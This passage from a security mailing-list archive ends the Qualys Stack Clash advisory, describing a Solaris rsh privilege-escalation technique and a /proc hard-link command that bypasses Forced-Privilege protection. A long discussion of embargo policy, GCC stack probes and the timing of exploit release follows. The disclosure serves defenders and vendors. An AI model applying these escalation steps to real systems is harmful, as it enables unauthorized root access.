re-execve() (does not re-randomize the ld.so-stack distance for each
new connection) unless the attacker is able to restart the service,
reboot the server, or target a 32K-server farm.

========================================================================
IV.5.2. /usr/bin/rsh exploit
========================================================================

/usr/bin/rsh is SUID-root and its main() function allocates a 50KB
stack-based buffer that is not written to and can be used to jump over
the stack guard-page, into ld.so's read-write segment, in Step 3 of our
simplified stack-clash exploit.

Next, we discovered a general method for gaining eip control in Step 4b:
setlocale(LC_ALL, ""), called by the main() function of /usr/bin/rsh and
other SUID binaries, copies the LC_ALL environment variable to several
stack-based buffers and thus smashes ld.so's read-write segment and
overwrites some of ld.so's function pointers.

Last, we execute our own shell-code: we return-into-binary (/usr/bin/rsh
is not a PIE), to an instruction that reliably jumps into a copy of our
LC_ALL environment variable in ld.so's read-write segment, which is in
fact read-write-executable. For example, after we gain control of eip:

- on Solaris 11.1, we return to a "pop; pop; ret" instruction, because a
pointer to our shell-code is stored at an 8-byte offset from esp;

- on Solaris 11.3, we return to a "call *0xc(%ebp)" instruction, because
a pointer to our shell-code is stored at a 12-byte offset from ebp.

Our Solaris exploit brute-forces the random ld.so-stack distance and two
parameters:

- the RLIMIT_STACK;

- the length of the LC_ALL environment variable.

========================================================================
IV.5.3. Forced-Privilege vulnerability (CVE-2017-3631)
========================================================================

/usr/bin/rsh is SUID-root, but the shell that we obtained in Step 4b of
our stack-clash exploit did not grant us full root privileges, only
net_privaddr, the privilege to bind to a privileged port number.
Disappointed by this result, we investigated and found:

$ ggrep -r /usr/bin/rsh /etc 2>/dev/null
/etc/security/exec_attr.d/core-os:Forced Privilege:solaris:cmd:RO::/usr/bin/rsh:privs=net_privaddr

$ /usr/bin/rsh -h
/usr/bin/rsh: illegal option -- h
usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command
rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host

# cat truss.out
...
7319: execve("/usr/bin/rsh", 0xA9479C548, 0xA94792808) argc = 2
7319: *** FPRIV: P/E: net_privaddr ***
...

Unfortunately, this Forced-Privilege protection is based on the pathname
of SUID-root binaries, which can be execve()d through hard-links, under
different pathnames (CVE-2017-3631). For example, we discovered that
readable SUID-root binaries can be execve()d through hard-links in
/proc:

$ sleep 3 < /usr/bin/rsh & /proc/${!}/fd/0 -h
[1] 7333
/proc/7333/fd/0: illegal option -- h
usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command
rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host

# cat truss.out
...
7335: execve("/proc/7333/fd/0", 0xA947CA508, 0xA94792808) argc = 2
7335: *** SUID: ruid/euid/suid = 100 / 0 / 0 ***
...

This vulnerability allows us to bypass the Forced-Privilege protection
and obtain full root privileges with our /usr/bin/rsh exploit.


========================================================================
V. Acknowledgments
========================================================================

We thank the members of the distros list, Oracle/Solaris, Exim, Sudo,
***@kernel.org, grsecurity/PaX, and OpenBSD.
k***@redhat.com
2017-06-19 15:40:28 UTC
On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
>
> Qualys Security Advisory
>
> The Stack Clash

I just want to publicly thank Qualys for working with the Open Source
community so we (Linux and *BSD) could all get this fixed properly.
There was a lot of work from everyone involved and it all went pretty
smoothly.

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Daniel Micay
2017-06-19 16:46:20 UTC
On Mon, 2017-06-19 at 09:40 -0600, ***@redhat.com wrote:
> On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
> >
> > Qualys Security Advisory
> >
> > The Stack Clash
>
> I just want to publicly thank Qualys for working with the Open Source
> community so we (Linux and *BSD) could all get this fixed properly.
> There was a lot of work from everyone involved and it all went pretty
> smoothly.

Fixing it properly would really also include fixing these:

https://gcc.gnu.org/bugzilla/show_bug.cgi?id=68065
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66479

and actually implementing -fstack-check as not just a no-op in Clang.

Windows has working stack probes, even in Windows XP and perhaps even
earlier. LLVM has working stack probes there (not sure if GCC deals with
it properly) yet doesn't make them available elsewhere.

Rust is 'memory safe' but has this same stack exhaustion issue. It
didn't use to have the issue, since it kept the LLVM segmented-stack
code generation around, after dropping segmented stacks, to check for
stack overflow in function prologues. That check was dropped for a 1-3%
performance win from using stack probes instead, which was a good idea,
except that stack probes were never implemented, which made it a
terrible idea. Implementing them was deferred to some later date. That
was in July 2015, and 2 years later it's still not done.
Marcus Meissner
2017-06-19 16:48:36 UTC
On Mon, Jun 19, 2017 at 12:46:20PM -0400, Daniel Micay wrote:
> On Mon, 2017-06-19 at 09:40 -0600, ***@redhat.com wrote:
> > On 06/19/2017 09:28 AM, Qualys Security Advisory wrote:
> > >
> > > Qualys Security Advisory
> > >
> > > The Stack Clash
> >
> > I just want to publicly thank Qualys for working with the Open Source
> > community so we (Linux and *BSD) could all get this fixed properly.
> > There was a lot of work from everyone involved and it all went pretty
> > smoothly.
>
> Fixing it properly would really also include fixing these:
>
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=68065
> https://gcc.gnu.org/bugzilla/show_bug.cgi?id=66479
>
> and actually implementing -fstack-check as not just a no-op in Clang.
>
> Windows has working stack probes, even in Windows XP and perhaps even
> earlier. LLVM has working stack probes there (not sure if GCC deals with
> it properly) yet doesn't make them available elsewhere.
>
> Rust is 'memory safe' but has this same stack exhaustion issue. It
> didn't used to have the issue, since it kept around the LLVM segmented
> stack code generation after it dropped segmented stacks to check for
> stack overflow in function preludes. That got dropped for a 1-3%
> performance win from using stack probes instead... which was a good
> idea, but without implementing stack probes... making it a terrible
> idea. It was deferred to some later date. That was in July 2015, and 2
> years later it's not done.

The GCC team, at least, has been working on patches for this, and will
also continue that work publicly soon.

Ciao, Marcus
Solar Designer
2017-06-19 20:39:33 UTC
On Mon, Jun 19, 2017 at 09:40:28AM -0600, ***@redhat.com wrote:
> I just want to publicly thank Qualys for working with the Open Source
> community so we (Linux and *BSD) could all get this fixed properly.
> There was a lot of work from everyone involved and it all went pretty
> smoothly.

+1

It's excellent research by Qualys, building upon yet exceeding what was
previously known about this vulnerability class. The quality of Qualys'
writing is also rare these days.

That said, we owe apologies to the community for violating the published
distros list policy regarding the maximum embargo duration. Personally
and as distros list admin, I do apologize for letting this happen.

I think we shouldn't have let it happen.

The stated argument for extending the embargo duration beyond list
policy's maximum was that fixes presumably wouldn't be ready.

However, there were also arguments in favor of disclosing on the
originally planned date, which was within list policy: interim
workarounds and mitigations could be ready in time for that, the fixes
that would be ready by the later date (thus, presumably are ready now)
are not the end of the story anyway (specifically, gcc -fstack-check
wasn't expected to be ready, and isn't - let alone having distros'
userlands rebuilt with that option), the general issue wasn't new, and
all the usual arguments against long embargoes applied (some of the
affected parties being left out of the discussion, inconvenient and maybe
less productive discussion in the smaller private community, risk of
leaks, risk of rediscovery).

Apparently, the workarounds and mitigations just were not enterprisey
enough for the bigger players. Releasing interim updates first would
mean the vendors would have to acknowledge that some (I think obscure)
functionality might be temporarily(?) gone, until a later final update
that would include the more invasive fixes for the underlying issues
while optionally removing the previously introduced workarounds and
mitigations (although personally I would prefer to make them standard,
as security hardening). The vendors could also provide a knob (e.g., a
sysctl) to restore the questionable functionality right away (in this
case, it's things like limited debugging of dynamic linking on SUID/SGID
exec, and multi-megabyte command-line argument lists to SUID/SGID
programs) for those customers who prefer no risk of breakage over
security. I understand it's a tough trade-off to expose to a paying
customer. Yet I think it would have been most reasonable from purely
technical and community-friendliness points of view.

As the Qualys advisory says, relevant security hardening for the Linux kernel is
already found in grsecurity (per my quick check, some of it since 2012,
some earlier). Relevant security hardening for glibc has been in Owl's
and ALT Linux's packages (always enabled - no knob) since at least 2005
(some or all of it probably also since 2000-2001, but I didn't re-review
how complete older revisions of that patch were). Merging some of those
changes (at least the least invasive ones, sufficient to deal with the
most promising and most immediate attacks - short of the currently more
hypothetical remote attacks on system services) into distros' kernels
and glibc could surely be done in 14 days, including QA.

Apparently, companies disclosing security issues are concerned about being
held to a higher standard (than individuals) with regard to being (or
appearing) responsible. If a company's disclosure is deemed
irresponsible by some (like we've seen happen before), that company (and
others) might become more cautious next time (which might be what
happened here), or worse - they might no longer fund security research
(luckily not the case here).

When I say these things, I don't mean to blame anyone, nor any company.
Everyone was probably doing their best under their circumstances. I am
merely sharing my thoughts with the community.

Qualys first informed the distros list about this upcoming set of issues
on May 3. This initial notification didn't say Stack Clash nor anything
like that, but merely expressed intent to disclose the issues and
concern that the list's maximum embargo duration of 14 to 19 days might
not be sufficient in this case. In the resulting discussion, I agreed
to consider extending the embargo beyond list policy should there be
convincing reasons for that. In retrospect, I think I shouldn't have
agreed to that.

Qualys posted the detail to distros on May 17 with public disclosure
planned for May 30, which was within list policy. Due in part to
requests by Red Hat (who were going to do much of the work needed by
other distros, in particular on glibc) and presumably Qualys' internal
reasoning, on May 23 Qualys unilaterally said they were extending the
embargo until June 19 (the date previously requested by Red Hat, and
IIRC one that Qualys had said was also known good for Oracle Solaris,
although Oracle was OK with others publishing on May 30), and they said
they were already in the process of informing others (those they had
notified beyond the distros list membership) of this extension.

This was against what I had said previously, where I offered merely to
consider extending the embargo, not to unconditionally accept a decision
like this from Qualys nor anyone else. At this point, I was still within my
rights to insist on the originally planned date, and to make it happen
technically - just post the detail to oss-security myself on May 30, as
that wouldn't have violated any agreement I had. (Of course, people
would be mad at me.) Instead:

On Tue, May 23, 2017 at 11:21:01AM +0200, Solar Designer wrote:
> That's really bad. I don't support you in your decision as from my
> perspective it's wrong, but I also don't want to go against it.
> So I reluctantly accept it

I didn't say it at the time, but frankly part of my reasoning for the
reluctant acceptance was that I had no idea what might have been going
on inside Qualys, nor wanted to have that inside info. I understand
it's rare for companies to do quality security research, and I didn't
want my action to have hampered the stream of quality security research
we're seeing from Qualys lately.

Distro vendors saying they wouldn't be ready wasn't as important to me.
In fact, most distros hadn't yet expressed a clear opinion by then and I
was still NAK'ing Red Hat's requests at the time of Qualys' decision.

I am really not blaming Red Hat here. They were the ones making the
request largely because they were also one of two distros, the other
being SUSE, doing much of the work on shared upstream code, for the benefit
of most other Linux distros.

Anyhow, with the unfortunate embargo extension in place, my remaining
goal was to minimize the damage. I helped disentangle and push out two
of the sub-issues - with Sudo and ISC/Vixie Cron - on dates that are
within list policy (no more than 14 days since initial disclosure of
vulnerability detail on the distros list). I also used the opportunity
to test which of the distros are actually reading the lengthy thread
(resulting in one distro, which was represented by just one person,
getting removed from the distros list). Finally, it's also in this
context that I decided to accept some non-distro volunteers to help with
patch review (unfortunately, this hasn't worked well enough yet -
although some patch review did occur and changes were made, an important
issue with the first Sudo patch was missed).

Timeline:

May 3 - preliminary notification by Qualys, no detail
May 17 - detail posted by Qualys on Stack Clash and Sudo
May 23 - embargo extension
May 26 - detail posted by Qualys on Cron
May 30 - initially planned public disclosure date for all Qualys issues
May 30 - Sudo issue public:
http://www.openwall.com/lists/oss-security/2017/05/30/16
May 31 - Sudo incomplete fix fixed in 1.8.20p2
June 2 - Sudo incomplete fix and its fix announced:
http://www.openwall.com/lists/oss-security/2017/06/02/7
June 8 - Cron minor issue public (along with some fixes):
http://www.openwall.com/lists/oss-security/2017/06/08/3
June 19 - Stack Clash public

Since we were making this public in pieces like that, I have to say: no,
there's nothing else left to publish as part of this series of Qualys'
findings. Everything Qualys brought to distros so far is now public.

Given this experience, I am not going to give any impression I could
agree to an embargo extension beyond list policy again. I am going to
enforce the stated list policy. Unfortunately, this means that next
time someone or some company who's extra careful about being/appearing
responsible wants to inform distros of an issue, they might opt to work
with individual distros off-list or through some other channel. That's
life. At least the distros list would not be contributing to that.
Having this discussion explode on the distros list was not great in
other aspects anyway - it's too many too frequent messages for too long
to conveniently handle on an encrypted list. This wasn't worth it.

I am also going to remove the "up to 19 days" option, where an embargo
longer than 14 days (up to 19) could be applied for issues posted to
distros too close to or on a weekend, so that the embargo time could be
"rounded up" to expire next Tuesday after the normal maximum of 2 weeks.
Part of the reason for this removal, besides desire to shorten embargoes
in general and on average, is to remove the wrong incentive to report
issues to distros close to a weekend just to have (and give distros)
more time (much of that being an extra weekend). The original issue
this option tried to address can also be addressed by "rounding down"
(e.g., to last Wednesday or Thursday before 14 days would run out on a
weekend), so let's be doing that.

This wrong incentive didn't play a role this time, but it was mentioned.

Alexander

P.S. While I am at it, for those reading this in web archives of the
list here's a link to a portion of this thread on gcc issues, which I
think inadvertently broke off:

http://www.openwall.com/lists/oss-security/2017/06/19/6
Solar Designer
2017-06-20 13:22:04 UTC
On Mon, Jun 19, 2017 at 10:39:33PM +0200, Solar Designer wrote:
> Since we were making this public in pieces like that, I have to say: no,
> there's nothing else left to publish as part of this series of Qualys'
> findings. Everything Qualys brought to distros so far is now public.

I have to correct the above statement as I totally forgot about the
exploits. While all issues Qualys brought to distros so far are now
public, Qualys' own exploits for them are not public yet. IIRC, Qualys
selectively sent the exploits to affected vendors, but that included
sending the Linux-specific exploits to the linux-distros sub-list.

Qualys, I suggest that, like you did with the Sudo exploit, you publish
your Stack Clash exploits in here as soon as third-party exploits of
comparable functionality appear, or next Tuesday, whichever is earlier.

Please confirm that you intend to do so in a reply to this message, so
that everyone in here knows what to expect.

Alexander
Qualys Security Advisory
2017-06-21 21:28:35 UTC
Hi Solar, all,

On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
> Qualys, I suggest that, like you did with the Sudo exploit, you publish
> your Stack Clash exploits in here as soon as third-party exploits of
> comparable functionality appear, or next Tuesday, whichever is earlier.

We have discussed this internally, and we will first publish the Stack
Clash exploits and proofs-of-concept that we sent to the distros@ and
linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
Solaris rsh exploit.

We will do so next Tuesday, but we will publish our Linux exploits and
proofs-of-concept if and only if Fedora updates are ready by then, our
NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
ready by then.

If someone happens to know of another major distribution that has not
published patches and updates yet, please let us all know by replying
here to oss-security. Thank you very much!

With best regards,

--
the Qualys Security Advisory team
n***@curso.re
2017-06-21 21:45:45 UTC
Qualys Security Advisory <***@qualys.com>
writes:

> Hi Solar, all,
>
> On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
>> Qualys, I suggest that, like you did with the Sudo exploit, you publish
>> your Stack Clash exploits in here as soon as third-party exploits of
>> comparable functionality appear, or next Tuesday, whichever is earlier.
>
> We have discussed this internally, and we will first publish the Stack
> Clash exploits and proofs-of-concept that we sent to the distros@ and
> linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
> Solaris rsh exploit.
>
> We will do so next Tuesday, but we will publish our Linux exploits and
> proofs-of-concept if and only if Fedora updates are ready by then, our
> NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
> and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
> ready by then.
>
> If someone happens to know of another major distribution that has not
> published patches and updates yet, please let us all know by replying
> here to oss-security. Thank you very much!
>
> With best regards,

(posting from gmane... I hope it's OK)

Hello,

not sure it counts as a major distribution (probably not), but NixOS
(https://nixos.org) is gaining traction and, as far as I understand,
they are working on patches but they don't seem to be ready yet.

Many thanks to everybody for your work,

-- S.
Franz Pletz
2017-06-21 23:03:16 UTC
On Wed, 21 Jun 2017 22:45:45 +0100
***@curso.re wrote:

> not sure it counts as a major distribution (probably not), but NixOS
> (https://nixos.org) is gaining traction and, as far as I understand,
> they are working on patches but they don't seem to be ready yet.

Hi,

there is an open pull request[0] that will be merged soon.

Unfortunately we can't yet fulfill all of the requirements of the
distros mailing list. That's why we had no prior notice.

NixOS does have an active security team[1] though.

Cheers,
Franz

[0]: https://github.com/NixOS/nixpkgs/pull/26750
[1]: https://nixos.org/nixos/security.html
Solar Designer
2017-06-26 00:35:57 UTC
On Wed, Jun 21, 2017 at 02:28:35PM -0700, Qualys Security Advisory wrote:
> On Tue, Jun 20, 2017 at 03:22:04PM +0200, Solar Designer wrote:
> > Qualys, I suggest that, like you did with the Sudo exploit, you publish
> > your Stack Clash exploits in here as soon as third-party exploits of
> > comparable functionality appear, or next Tuesday, whichever is earlier.
>
> We have discussed this internally, and we will first publish the Stack
> Clash exploits and proofs-of-concept that we sent to the distros@ and
> linux-distros@ lists, plus our Linux ld.so exploit for amd64, and our
> Solaris rsh exploit.
>
> We will do so next Tuesday, but we will publish our Linux exploits and
> proofs-of-concept if and only if Fedora updates are ready by then, our
> NetBSD proof-of-concept if and only if NetBSD patches are ready by then,
> and our FreeBSD proofs-of-concept if and only if FreeBSD patches are
> ready by then.
>
> If someone happens to know of another major distribution that has not
> published patches and updates yet, please let us all know by replying
> here to oss-security. Thank you very much!

Thank you!

We didn't have a specific policy on exploit publication, but for further
occasions I've just added this clarification to:

http://oss-security.openwall.org/wiki/mailing-lists/distros

"If you shared exploit(s) that are not an essential part of the issue
description, then at your option you may slightly delay posting them to
oss-security but you must post the exploits to oss-security within at
most 7 days of making the mandatory posting above. If you exercise this
option, you have two mandatory postings to make: first with a
sufficiently detailed issue description (as requested above) and with an
announcement of your intent to post the exploits separately (please
mention exactly when), and second with the exploits - or indeed you
could have included the exploits right away, in your first and only
mandatory posting."

The decision to wait for fixes in major distros that almost certainly do
intend to release fixes makes sense to me. I haven't found a good way
to specify it as part of policy yet. For now, we may plan to be not as
strict at enforcing the above addition to the policy as I intend to be
at enforcing the main policy of max 14 days for issue detail (possibly
excluding exploits). Specifically, occasional well-reasoned exceptions
where exploits may be posted later than in 7 days may be made - or maybe
we simply need to relax the "at most 7 days" requirement, replacing it
with a higher maximum and a 7 days guideline. Regardless, since this
will be for already-public issues, we'll be able to discuss any such
exceptions or policy changes in public as well - here on oss-security.

Alexander
Qualys Security Advisory
2017-06-28 17:45:37 UTC
Hi all,

On Mon, Jun 26, 2017 at 02:35:57AM +0200, Solar Designer wrote:
> The decision to wait for fixes in major distros that almost certainly do
> intend to release fixes makes sense to me.

Thank you. Since Fedora and Slackware published their updates, and
FreeBSD and NetBSD published their patches (and our *BSD POCs are not
full-fledged exploits anyway), we attached our Stack Clash exploits and
POCs to this mail (alternatively, they are also available at
https://www.qualys.com/research/security-advisories/).

A few notes on the Linux ld.so exploits:

- Linux_ldso_dynamic's probability of success varies significantly from
one SUID binary to another, because it depends on the size of the
.dynamic, .data, and .bss sections of the SUID binary.

- Linux_ldso_hwcap's probability of success depends on the length of the
path to the SUID binary -- as a rule of thumb, the longer the path,
the higher the probability of success.

- On Fedora and CentOS, Linux_ldso_hwcap_64 may not work against
"short-path" SUID binaries, but it works against the "long-path" SUIDs
that are installed by default (for example,
/usr/lib/polkit-1/polkit-agent-helper-1).

Moreover, we wrote a quick-and-dirty version of this exploit that does
work against the SUIDs in /usr/bin (it does not hardcode the 96KB/32KB
sizes of argv[] pointers/free stack space, but instead optimizes these
sizes). However, we wanted to keep the main loop of this exploit as
simple as possible, and this improvement is therefore left as an
exercise for the interested reader.

We are at your disposal for questions, comments, and further
discussions. Thank you very much!

With best regards,

--
the Qualys Security Advisory team

Give 'Em Enough ROP
--The Clash, second studio album
Josh Bressers
2017-06-21 12:35:34 UTC
On Mon, Jun 19, 2017 at 3:39 PM, Solar Designer <***@openwall.com> wrote:
>
>
> That said, we owe apologies to the community for violating the published
> distros list policy regarding the maximum embargo duration. Personally
> and as distros list admin, I do apologize for letting this happen.
>
> I think we shouldn't have let it happen.
>
>
I suspect the extended embargo was exactly correct in this instance. Having
a policy you follow no matter what isn't ideal either (in fact it's
probably dangerous).

We've all been through a lot of embargoes, two weeks is more than
acceptable for most of them, it's a very good thing to have a forcing
function when needed. This one was special, nobody can deny that. It was
big, complex, and amazing. It ticked all the boxes. It affected a
substantial portion of the Internet. Had a name. Is a very old bug. Was
very serious. Had a great advisory and organization behind it.

Yet nobody flipped out. It was unexciting.

I suspect it was all so smooth on Monday because everyone was
ready, everyone knew what was going on. There was no rushing, nothing was
on fire. There was time to develop patches properly. Everyone had their
story straight. It's quite likely if you force a release in two weeks
because that's the rule, someone not ready would create a story where one
shouldn't exist.

I applaud everyone involved. I'm sure there were issues, but I doubt such a
large effort could have gone better. Rules such as this exist to guide us,
don't let them constrain us.

--
JB
Solar Designer
2017-06-21 14:36:31 UTC
On Wed, Jun 21, 2017 at 07:35:34AM -0500, Josh Bressers wrote:
> I suspect the extended embargo was exactly correct in this instance.

There are certainly good arguments in favor of the extended embargo, and
a lot of people will agree with you.

There are also good arguments in favor of not having extended the
embargo, and to me those are more convincing overall.

So it's not an instance of us having done something unambiguously wrong,
nor something unambiguously right. It's a matter of different
approaches and opinions. But there's also the list policy, and it is
such for good reasons.

> Having
> a policy you follow no matter what isn't ideal either (in fact it's
> probably dangerous).

This is why there have been occasional exceptions so far, and I tried to
note and explain each one of those publicly here on oss-security. This
is also why I agreed to "consider" making an exception in this case, but
I dislike what this resulted in. Naturally, my mandatory explanation
reflects that.

> We've all been through a lot of embargoes, two weeks is more than
> acceptable for most of them, it's a very good thing to have a forcing
> function when needed. This one was special, nobody can deny that. It was
> big, complex, and amazing. It ticked all the boxes. It affected a
> substantial portion of the Internet. Had a name. Is a very old bug. Was
> very serious. Had a great advisory and organization behind it.

It was an excellent stress-test for the distros list, people's ability
to read lots of encrypted e-mail, etc. But let's not do it again.

> Yet nobody flipped out. It was unexciting.

Well, almost. For something shared with so many organizations and
people, it is in fact unexciting we haven't seen a full public leak.

When the embargo extension was made, it was also decided that distros
should in fact be prepared for leaks, which means preparing or being
ready to prepare emergency updates with what I called mitigations and
workarounds. What I think we should have done instead is work in this
emergency mode from the start, releasing those mitigations and
workarounds first and only then work in public on longer-term fixes.

> I suspect it was all so smooth on Monday because everyone was
> ready, everyone knew what was going on. There was no rushing, nothing was
> on fire. There was time to develop patches properly. Everyone had their
> story straight. It's quite likely if you force a release in two weeks
> because that's the rule, someone not ready would create a story where one
> shouldn't exist.

Yes. However, one Linux distro vendor who is not currently on distros
(despite having asked privately to join before) e-mailed me off-list saying
they were indeed on fire (even if largely in terms of publicity and
customer support rather than security). And that's just one who
bothered to e-mail - I'm sure there were more. Granted, they can now
prepare their updates within hours or days due to the work done by SUSE,
Red Hat, and others on the distros list, hopefully in time before
attacks using the Qualys findings start or become widespread, but
nevertheless they are at a disadvantage. They also confirmed to me that
for them, either my shutting down the distros list or my accepting them
onto the list would be a better option than the status quo.

So I am in fact planning to do one of these things. My removal of the
"19 days" option is also a way to counter-balance the negative impact of
possibly adding a few more distros. I wish we could go for 7 days max,
but currently this appears unrealistic (we should have the average below
7 days, though). So I'll open up the distros list for more members
shortly, but I am going to enforce the policy more(*) strictly. If this
fails, then I'll shut the list down.

(*) This means there might still be an exception for something truly
exceptional, but to be specific: nothing handled on the (linux-)distros
lists so far was exceptional enough for that, so under the kind of
policy enforcement I am currently planning, there would have been no
exceptions so far.

> I applaud everyone involved. I'm sure there were issues, but I doubt such a
> large effort could have gone better.

I agree.

However, we need to learn from this occasion and do better next time.

> Rules such as this exist to guide us, don't let them constrain us.

I see no other reasonable choice than letting the rules constrain us,
given what my willingness to "consider" an exception resulted in.

That said, I intend to stay reasonable - just having learned and made
adjustments from the experience so far.

Alexander
Stuart Henderson
2017-06-21 15:15:52 UTC
On 2017/06/21 16:36, Solar Designer wrote:
> Granted, they can now
> prepare their updates within hours or days due to the work done by SUSE,
> Red Hat, and others on the distros list, hopefully in time before
> attacks using the Qualys findings start or become widespread, but
> nevertheless they are at a disadvantage.

People doing this might want to note that Icinga ran into problems
with the fix in RHEL/Centos kernels when using setrlimit to restrict
the stack size below the default.

The Red Hat ticket is currently locked but there's some information at
https://bugs.centos.org/view.php?id=13453.
k***@redhat.com
2017-06-21 16:06:39 UTC
On 06/21/2017 09:15 AM, Stuart Henderson wrote:
> On 2017/06/21 16:36, Solar Designer wrote:
>> Granted, they can now
>> prepare their updates within hours or days due to the work done by SUSE,
>> Red Hat, and others on the distros list, hopefully in time before
>> attacks using the Qualys findings start or become widespread, but
>> nevertheless they are at a disadvantage.
>
> People doing this might want to note that Icinga ran into problems
> with the fix in RHEL/Centos kernels when using setrlimit to restrict
> the stack size below the default.
>
> The Red Hat ticket is currently locked but there's some information at
> https://bugs.centos.org/view.php?id=13453.

Ah sorry about that, I've made

https://bugzilla.redhat.com/show_bug.cgi?id=1463241

public. Kernel bugs default to private and then typically get opened up
(mostly because people have a tendency to put traces/dumps with
sensitive information in them and we don't want someone accidentally
exposing their SSH host keys or whatever).

--
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: ***@redhat.com
Qualys Security Advisory
2017-06-21 21:40:06 UTC
Hi Solar, all,

Thank you very much for this constructive feedback. For the sake of
transparency and an improved disclosure process in the future, we will
do the same now, and also address some of the concerns that have been
expressed since Monday.

But first, we would like to thank everyone who was involved in this
disclosure, for their hard work and patience, and especially Solar for
creating and administering the mailing-lists that made it possible (and
for accepting, although reluctantly, the embargo extension).

On Mon, Jun 19, 2017 at 10:39:33PM +0200, Solar Designer wrote:
> The stated argument for extending the embargo duration beyond list
> policy's maximum was that fixes presumably wouldn't be ready.

This was not the only reason why we eventually decided to extend the
embargo; here is what we wrote in an e-mail to distros@, on May 28:

"""
The discussions that
took place here on distros eventually forced us to extend the embargo
from the original CRD (May 30) to June 19:

- there are serious problems with the two solutions that we proposed
("Increase the size of the stack guard-page" and "Recompile all
userland code with GCC's -fstack-check option");

- please see Red Hat's analysis, attached;

- when we asked here if distros would be ready by May 30, only three
answered (two "yes", one "no"), and hoping for the best ("the ones who
did not answer will surely be ready") was not an option, and "let's
publish anyway on May 30, distros should have been ready" was not an
option either (the end users would be the ones suffering from such a
debacle).
"""

The first problem was that 1MB is not enough on all architectures; the
second problem was that -fstack-check does not always "touch" all pages;
and Red Hat's analysis was an extensive report about the fixes needed in
the kernel, the glibc, and gcc.

All of this, plus the third reason mentioned above, and our own
assessment of the situation, helped us make our decision to extend the
embargo.

> I understand
> it's rare for companies to do quality security research, and I didn't
> want my action to have hampered the stream of quality security research
> we're seeing from Qualys lately.

Thank you very much. However, we must admit that this coordinated
release has been one of the most stressful and painful experiences we
ever had: we were torn between those who wanted to publish early and
those who wanted to publish later, and in the middle of all this
coordination we were trying to complete our research (we had not
successfully exploited 64-bit Linux yet when we first contacted
distros@).

Such a responsible disclosure could have been, and should have been,
easier and simpler, even with so many vendors involved. How could such
a situation be handled better next time? We are open to suggestions.

Finally, we would like to address a concern that has been voiced by
Chris Evans (who has also quoted Solar's mail, thus answering here):

"""
There's also the question of whether "customers" get access to details
before patches are available
"""

Absolutely not: we have not shared a single detail of these
vulnerabilities with anyone outside of Qualys before the Coordinated
Release Date; and even within Qualys, we have kept this
compartmentalized until the very end.

Thank you very much!

With best regards,

--
the Qualys Security Advisory team
Jeff Law
2017-06-21 23:30:22 UTC
On 06/21/2017 03:40 PM, Qualys Security Advisory wrote:

>
> The first problem was that 1MB is not enough on all architectures; the
> second problem was that -fstack-check does not always "touch" all pages;
> and Red Hat's analysis was an extensive report about the fixes needed in
> the kernel, the glibc, and gcc.
And just one data point here. We (Red Hat) had hoped to be able to drop
in a compiler update with an improved -fstack-check and rebuild at least
glibc with that compiler.

However, the further we dug, the more significant problems we found,
particularly as we started looking at other architectures.

As late as June 8, we were still internally debating the pros/cons of
updating GCC and rebuilding GLIBC with the new compiler, even if only
certain platforms were covered. The ultimate decision was to play it
safe and defer integration of the GCC work to a later update.

The embargo extension may have been painful, but it gave us the time to
look deeply at the GCC situation and come to a well reasoned technical
conclusion.

Had we gone forward in May per the original schedule, we could well have
made an incorrect technical decision under the significant time
pressure. The consequences of getting that decision wrong are
potentially greater than the impact of this particular security issue.
That would also have put other distros that use GCC at a disadvantage
as the in-progress GCC bits were not "upstream ready" and thus would
have been dropped into Red Hat's GCC sources which would likely have
been fairly difficult for other distros that use GCC to consume.




>
> All of this, plus the third reason mentioned above, and our own
> assessment of the situation, helped us make our decision to extend the
> embargo.
Understood and thanks for evaluating the situation as a whole and coming
to a well reasoned decision WRT the embargo.

--


I don't speak for anyone but myself, but I strongly believe in making
reasonable, rational decisions based on the best information available
rather than following policy blindly. Don't get me wrong, policy is
important as it often encodes years of hard learned lessons and often
policy is a good default position.


>
>> I understand
>> it's rare for companies to do quality security research, and I didn't
>> want my action to have hampered the stream of quality security research
>> we're seeing from Qualys lately.
>
> Thank you very much. However, we must admit that this coordinated
> release has been one of the most stressful and painful experiences we
> ever had: we were torn between those who wanted to publish early and
> those who wanted to publish later, and in the middle of all this
> coordination we were trying to complete our research (we had not
> successfully exploited 64-bit Linux yet when we first contacted
> distros@).
Understood. I'd like to point out that knowing 64bit exploits had not
been completed, but looked reasonably possible was very helpful in our
internal discussions about the breadth of the problem.

And more generally thanks for all the work in this space! Don't ever
hesitate to contact me with any questions/concerns WRT GCC's code
generation in this space or others.


jeff
Daniel Micay
2017-06-22 06:00:52 UTC
Is it planned to have glibc use a larger 1M gap for secondary stacks
rather than a single guard page? That would be a *lot* easier than it
was to set it up for the main thread stack. It follows the main thread
stack rlimit as a guideline so it seems to make sense to use the same
guard region size too. If it ends up exposed as a sysctl, it could read
the current value from there.

For the local setuid/setgid/setcap binary attack surface, the main
thread stack is most relevant, but in general many cases of large stack
frames that were found are called in threads other than the initial one.
Secondary stacks are also mixed in with other mmap allocations rather
than having a separate ASLR base and glibc doesn't do any secondary
stack ASLR. IIRC, it does cache color the stacks but not randomly and I
don't remember how much space it currently reserves for that.
Florian Weimer
2017-06-22 10:19:35 UTC
